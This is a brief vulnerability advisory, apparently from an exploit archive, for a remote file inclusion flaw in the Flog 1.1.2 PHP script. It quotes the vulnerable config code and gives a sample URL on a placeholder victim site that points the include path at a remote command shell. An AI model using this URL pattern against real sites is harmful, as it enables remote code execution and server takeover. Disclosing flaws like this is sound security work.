Flog version 1.1.2 suffers from a remote file inclusion flaw.
1aad1dc5f41f7d5706a2825844719a264949c8a288b3bdfabd7c6d661c4c24d7
# SaVSaK.CoM | SpC-x - The-BeKiR |
# Flog 1.1.2 Version - Remote File Include Vulnerabilities
# Risk : High
# Class: Remote
# Script : Flog
# Credits : SpC-x
# Thanks : The-BeKiR - Ejder - FasTBoY - ERNE - RMx - Nukedx - Str0ke
# Code :
# <?php
# $FLog_dir_plugins = 'plugins/';
# $FLog_dir_data = 'data/';
# $FLog_dir_themes = 'themes/';
# $FLog_dir_include = 'include/';
# $FLog_dir_files = 'files/';
# require_once($FLog_dir_include.'core.inc.php');
# ?>
# Vulnerable :
# http://www.victim.com/Flog/config.php?FLog_dir_include=Command-Shell